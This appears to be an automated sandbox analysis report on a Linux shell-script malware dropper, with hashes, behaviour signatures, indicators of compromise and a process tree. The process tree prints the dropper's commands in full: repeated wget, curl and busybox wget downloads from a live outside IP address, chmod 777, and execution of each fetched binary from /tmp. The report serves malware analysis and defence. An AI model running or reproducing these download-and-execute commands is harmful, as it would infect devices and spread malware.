Analysis
-
max time kernel
82s -
max time network
84s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
-
Size
10KB
-
MD5
9498e3b84daf1f4fc7db572ea81ea29a
-
SHA1
d111505e7f6138c1c8a076bcc550d27c2af9435d
-
SHA256
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27
-
SHA512
59578af0e9e9a321012ffa73db2ca0c348f5dca7652699e0b4af750e484904a86639affdd1e915279db83872d418ac858ceb4d514a3a38006959626b0bd5f66c
-
SSDEEP
192:19JmC837g7T3DywO2SFuuP5AE3m2EyAE3m2xmCjz3j3DyD2SFuuaS:196g7jfY5AE3m2EyAE3m2HPXS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 969 chmod 903 chmod 747 chmod 825 chmod 981 chmod 807 chmod 915 chmod 945 chmod 885 chmod 939 chmod 963 chmod 779 chmod 866 chmod 891 chmod 897 chmod 879 chmod 921 chmod 927 chmod 741 chmod 841 chmod 873 chmod 957 chmod 975 chmod 753 chmod 816 chmod 909 chmod 933 chmod 951 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw 742 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj 748 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S 755 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB 780 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b 809 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk 817 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la 826 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc 843 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa 868 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc 874 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV 880 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM 886 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE 892 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj 898 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE 904 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj 910 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S 916 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB 922 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw 928 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj 934 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk 940 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la 946 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b 952 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV 958 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM 964 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc 970 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa 976 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc 982 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S curl File opened for modification /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc curl File opened for modification /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV curl File opened for modification /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE curl File opened for modification /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la curl File opened for modification /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b curl File opened for modification /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa curl File opened for modification /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b curl File opened for modification /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa curl File opened for modification /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE curl File opened for modification /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw curl File opened for modification /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj curl File opened for modification /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj curl File opened for modification /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB curl File opened for modification /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc curl File opened for modification /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw curl File opened for modification /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk curl File opened for modification /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc curl File opened for modification /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM curl File opened for modification /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S curl File opened for modification /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM curl File opened for modification /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc curl File opened for modification /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj curl File opened for modification /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB curl File opened for modification /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la curl File opened for modification /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj curl File opened for modification /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk curl File opened for modification /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV curl
Processes
-
/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:739
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:746
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:752
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:774
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:802
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:815
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:824
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:836
-
-
/bin/chmodchmod 777 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc./tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:862
-
-
/bin/chmodchmod 777 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa./fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:872
-
-
/bin/chmodchmod 777 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc./Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:878
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:884
-
-
/bin/chmodchmod 777 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM./ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:890
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:896
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:902
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:908
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:914
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:920
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:926
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:932
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:938
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:939
-
-
